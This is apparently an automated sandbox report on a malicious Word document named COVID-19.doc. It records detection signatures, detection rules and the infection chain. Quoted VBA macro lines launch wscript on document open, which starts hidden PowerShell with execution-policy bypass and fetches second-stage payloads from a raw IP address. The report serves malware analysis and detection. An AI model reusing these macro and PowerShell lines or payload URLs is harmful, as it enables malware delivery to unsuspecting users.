Loading ...

Play interactive tourEdit tour

Analysis Report COVID-19.doc

Overview

General Information

Sample Name:COVID-19.doc
Analysis ID:341993
MD5:9f9f50f3c32ee660a8bbe6616dda8b34
SHA1:6c338a10e894bcad8c67e5da332a6cd7f75f35e0
SHA256:9d063fd60d7d0fb2d4d92f0f348bb2397cf80dd8a4fec5680647469b570f2afe

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious javascript / visual basic script found (invalid extension)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2620 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • wscript.exe (PID: 2664 cmdline: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp MD5: 045451FA238A75305CC26AC982472367)
      • powershell.exe (PID: 2472 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\d569872345345[1].txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x7e:$sb3: -WindowStyle Hidden
  • 0x145:$sb3: -WindowStyle Hidden
  • 0x73:$sc2: -NoProfile
  • 0x63:$sd2: -NonInteractive
  • 0x445:$se3: -ExecutionPolicy Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2091537255.000000000049A000.00000004.00000001.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x59e:$sb3: -WindowStyle Hidden
  • 0x665:$sb3: -WindowStyle Hidden
  • 0x593:$sc2: -NoProfile
  • 0x583:$sd2: -NonInteractive
  • 0x965:$se3: -ExecutionPolicy Bypass
00000002.00000003.2091136338.0000000004350000.00000004.00000040.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x78ae:$sb3: -WindowStyle Hidden
  • 0x7975:$sb3: -WindowStyle Hidden
  • 0x8f4e:$sb3: -WindowStyle Hidden
  • 0x9015:$sb3: -WindowStyle Hidden
  • 0x78a3:$sc2: -NoProfile
  • 0x8f43:$sc2: -NoProfile
  • 0x7893:$sd2: -NonInteractive
  • 0x8f33:$sd2: -NonInteractive
  • 0x7c75:$se3: -ExecutionPolicy Bypass
  • 0x9315:$se3: -ExecutionPolicy Bypass

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, CommandLine: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2620, ProcessCommandLine: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, ProcessId: 2664

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Machine Learning detection for sampleShow sources
Source: COVID-19.docJoe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2096344887.00000000027F0000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\wscript.exe
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 78.141.194.181:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 78.141.194.181:80
Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: global trafficHTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 78.141.194.181Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 09:25:07 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Fri, 25 Dec 2020 16:29:47 GMTETag: "5a7-5b74c6eccbba7-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plainData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 54 6d 6f d3 30 10 fe dc fc 8a 53 55 94 56 c8 d9 ba 96 31 8a f6 61 94 01 95 d8 5a 2d 88 7d 60 08 79 ce b5 31 24 76 b0 9d 6e 15 f4 bf 73 76 32 68 11 2f 91 92 d8 be b7 e7 9e bb 73 c5 0d 2f fb 1f 66 ca 8d 8e 3e f6 78 56 4a 75 25 57 b9 b3 70 0a 87 83 48 2e fb b0 77 ca f0 2b 1c c2 20 fa 16 75 7a dc ac bc 5a cc ce ef 51 d4 4e 6a b5 d0 85 14 1b 78 b1 a9 b8 25 dd 4b fd 56 af b4 ff 2b 0a 80 86 0b 27 d7 e8 f7 0b a3 97 b2 a0 e5 b5 54 99 be 4b dd 86 36 6f 64 96 a1 02 f6 ca 4b ba 31 3c 86 de c5 66 a6 d6 5a 70 ef 3c f9 b5 bc e4 25 92 38 ee 02 db 05 37 8c 09 95 a9 95 c2 8c 70 f5 96 bc b0 18 75 ee 72 f2 d7 07 a6 b4 83 07 e9 20 ea 50 06 9d 77 66 43 5f bf ea a4 8e 1b c7 08 97 40 0f dd 63 58 70 97 43 b7 d2 77 68 6c 8e 45 91 e0 3d 52 c4 33 b3 aa 4b 54 ee ad b4 e4 30 90 f0 c7 34 de a3 b9 85 ab 5a 9d 59 ef 7f 07 97 33 35 c1 ea 6c e9 9d 72 27 f2 16 02 ed b7 d1 16 22 24 d4 f0 2d 02 7a 7a f3 f4 cc 88 5c 3a 14 ae 36 48 c6 fd d7 e8 d8 75 29 e7 b7 9f e9 0c d8 b4 f0 4c 53 f8 d1 d1 a7 79 45 14 3b a9 56 e9 c6 3a 2c e1 3b a4 58 90 16 6b 95 e9 f9 cd 1f 3b 37 46 9b 33 e1 39 85 d4 e9 6a 90 ec 6b 04 14 72 09 fd df 91 b0 f3 af 10 1f 8f d9 ad 74 f1 a0 45 fb f0 f4 aa ca e6 ba f4 70 e3 e9 e4 a6 e1 c6 de 10 aa eb f9 f5 f1 f8 e1 60 e1 89 4d 3d b1 37 eb 61 72 18 07 1f 5b d8 49 ff ff 0e 29 cd d1 d1 bf 1d 46 0d 93 b5 29 c8 bc 9b 3b 57 4d 0e 0e 9e 9e 24 c3 f1 30 19 3e 1b 27 c3 93 e1 81 1d 8d 9f 9d 3c 1d 8f 9e d0 37 71 f7 ae db 1a 65 d6 85 66 3c 85 0f 4d b0 64 36 4f 7c 5b 7c 9c 4c a8 10 57 9c e2 96 5e c3 37 64 7f e0 5b 32 a9 ec b0 89 dc 5b 36 a6 3f d1 93 f4 26 74 75 eb b6 09 32 2b 2b 4d 9d 77 a1 b3 9a d4 5f 48 67 df 19 ae ec 12 4d 10 37 7d b9 7b 0c 2c d5 b5 11 d8 e4 c4 5e a2 a5 9a 87 b1 68 42 b6 d8 2d 9a b5 14 1e 00 c4 56 80 30 c8 1d 82 c8 51 7c a9 ab cc af 6f a5 aa 28 17 62 e5 d1 74 7e 91 2e ce a7 8f e0 60 0a d6 47 84 bd a3 80 7a 37 8d fd a1 80 bf de 00 81 bd 60 1d c8 08 23 1b fc 9f 42 86 05 df 60 c6 78 ed 34 bc 94 b6 a2 ad a7 91 e0 4c 3d 48 58 6a 03 0d 52 db 6d 19 15 a5 1f a0 2e fd 42 58 0f 56 78 47 b8 9f d9 f3 1d 85 07 1e 9e ef 1b 35 49 ee da b4 35 f7 97 cc 17 a4 84 2a 43 17 81 27 95 4d 75 59 52 a5 43 f8 06 47 65 f4 aa 6d 8c 9e 15 46 56 6e 52 ee de 54 17 9b d6 26 34 4b b0 b9 c2 52 af 91 cd fc 60 fe b2 67 af b4 af e4 fe 1c 92 40 b9 82 5c 28 2a 2c 5d 15 d1 36 fa 01 72 ee da 87 a7 05 00 00 Data Ascii: Tmo0SUV1aZ-}`y1$vnsv2h/s/f>xVJu%WpH.w+ uzZQNjx%KV+'TK6odK1<fZp<%87pur PwfC_@cXpCwhlE=R3KT04ZY35lr'"$-zz\:6Hu)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{17819F7E-DC64-4FB9-A805-BC7A4FB17A92}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 78.141.194.181Connection: Keep-Alive
Source: wscript.exe, 00000002.00000003.2090930329.000000000042F000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: wscript.exe, 00000002.00000003.2090930329.000000000042F000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: COVID-19.docString found in binary or memory: http://78.141.194.181/d5698723
Source: wscript.exe, 00000002.00000002.2091442381.00000000003C2000.00000004.00000001.sdmp, wscript.exe, 00000002.00000002.2091401068.00000000002B4000.00000004.00000040.sdmp, wscript.exe, 00000002.00000003.2091005428.00000000003C2000.00000004.00000001.sdmp, COVID-19.doc, COVID-19.tmp.0.drString found in binary or memory: http://78.141.194.181/d569872345345.txt
Source: COVID-19.docString found in binary or memory: http://78.141.194.181/d569872345345.txt$$
Source: wscript.exe, 00000002.00000002.2094003578.0000000003FEB000.00000004.00000001.sdmp, d569872345345[1].txt.2.drString found in binary or memory: http://78.141.194.181/s34987435987.txt
Source: wscript.exe, 00000002.00000002.2094477193.00000000058B0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2095768489.00000000022D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wscript.exe, 00000002.00000002.2091568558.0000000001C80000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: wscript.exe, 00000002.00000002.2094477193.00000000058B0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2095768489.00000000022D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.2095054638.00000000002D9000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.2095015204.000000000028E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

System Summary:

barindex
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)Show sources
Source: COVID-19.docOLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: COVID-19.docOLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: COVID-19.docOLE, VBA macro line: c = "wscript /e:jscript " + f
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: c = "wscript /e:jscript " + f
Document contains an embedded macro with GUI obfuscationShow sources
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string wscript.shell in non macro stream
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string activexobject in non macro stream
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string scripting.filesystemobject in non macro stream
Suspicious javascript / visual basic script found (invalid extension)Show sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: COVID-19.docOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: COVID-19.docOLE indicator, VBA macros: true
Source: 00000002.00000002.2091537255.000000000049A000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000002.00000003.2091136338.0000000004350000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\d569872345345[1].txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: classification engineClassification label: mal80.troj.expl.evad.winDOC@5/10@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$VID-19.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC32F.tmpJump to behavior
Source: COVID-19.docOLE indicator, Word Document stream: true
Source: COVID-19.docOLE document summary: title field not present or empty
Source: COVID-19.docOLE document summary: author field not present or empty
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................{...............................{.....................`I.........v.....................K..............<.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.................... ..v....................................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\InprocServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2096344887.00000000027F0000.00000002.00000001.sdmp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
